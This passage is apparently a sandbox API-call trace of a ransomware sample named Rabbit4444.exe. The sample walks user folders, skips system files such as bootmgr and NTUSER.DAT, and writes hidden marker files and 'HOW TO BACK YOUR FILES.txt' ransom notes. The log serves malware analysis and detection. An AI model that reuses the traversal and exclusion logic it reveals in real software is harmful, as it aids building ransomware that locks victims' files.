dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.892] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.892] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.892] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3b14e24d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b14e24d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.892] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0055.892] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0055.892] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0055.892] lstrcpyW (in: lpString1=0x130ebaa, lpString2="AC" | out: lpString1="AC") returned="AC" [0055.892] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0055.893] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x78) returned 0x10e8e8 [0055.893] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x1220c8 [0055.893] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3b14e24d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b14e24d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 0 [0055.893] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0055.893] lstrcpyW (in: lpString1=0x130ebaa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.895] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.895] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.895] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.895] CloseHandle (hObject=0x278) returned 1 [0055.895] CloseHandle (hObject=0x27c) returned 1 [0055.895] GetCurrentThreadId () returned 0xd98 [0055.895] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0055.895] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC" [0055.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10e8e8 | out: hHeap=0xe0000) returned 1 [0055.895] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0055.895] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC" [0055.895] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\" [0055.895] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\.BFC0E91B00AE8A0620D3" [0055.895] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.899] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.901] FlushFileBuffers (hFile=0x27c) returned 1 [0055.902] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.902] CloseHandle (hObject=0x27c) returned 1 [0055.903] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC") returned 59 [0055.903] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.903] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3b14e24d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeaa51ede, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0055.903] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.903] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.903] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.903] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.903] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3b14e24d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xeaa51ede, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.903] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.903] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.903] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.903] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.903] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.903] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa51ede, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa51ede, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa51ede, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.903] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.903] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.903] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eeb4b0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0055.904] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0055.904] lstrcpyW (in: lpString1=0x130ebb0, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0055.904] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0055.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0055.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8c) returned 0x11f188 [0055.905] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1220c8 [0055.905] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eebab7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0055.905] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0055.905] lstrcpyW (in: lpString1=0x130ebb0, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0055.905] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0055.906] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0055.906] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x90) returned 0x11e5a8 [0055.906] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x1222c8 [0055.906] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eebfeb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0055.906] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0055.906] lstrcpyW (in: lpString1=0x130ebb0, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0055.906] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0055.907] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0055.907] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x90) returned 0x11efc0 [0055.907] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221c8 | out: ListHead=0xf68b0, ListEntry=0x1221c8) returned 0x1221a8 [0055.907] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eec53c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0055.907] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0055.907] lstrcpyW (in: lpString1=0x130ebb0, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0055.907] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0055.907] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x82) returned 0x1056a0 [0055.907] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1221c8 [0055.907] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eec53c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0055.907] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0055.907] lstrcpyW (in: lpString1=0x130ebb0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.907] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.908] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.908] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0055.909] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.909] CloseHandle (hObject=0x278) returned 1 [0055.909] CloseHandle (hObject=0x27c) returned 1 [0055.909] GetCurrentThreadId () returned 0xd98 [0055.909] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0055.909] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp" [0055.909] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0055.909] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0055.909] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp" [0055.909] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\" [0055.909] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0055.909] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0055.911] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0055.914] FlushFileBuffers (hFile=0x27c) returned 1 [0055.915] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.915] CloseHandle (hObject=0x27c) returned 1 [0055.915] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp") returned 64 [0055.915] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.915] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eec53c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaa51ede, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0055.915] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.915] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.915] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0055.916] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.916] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2eec53c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeaa51ede, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.916] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.916] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.916] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0055.916] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.916] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.916] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa51ede, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa51ede, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa7816a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.916] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.916] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.916] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeaa51ede, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeaa51ede, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeaa7816a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.916] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0055.916] lstrcpyW (in: lpString1=0x130ebba, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.916] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0055.916] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0055.916] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 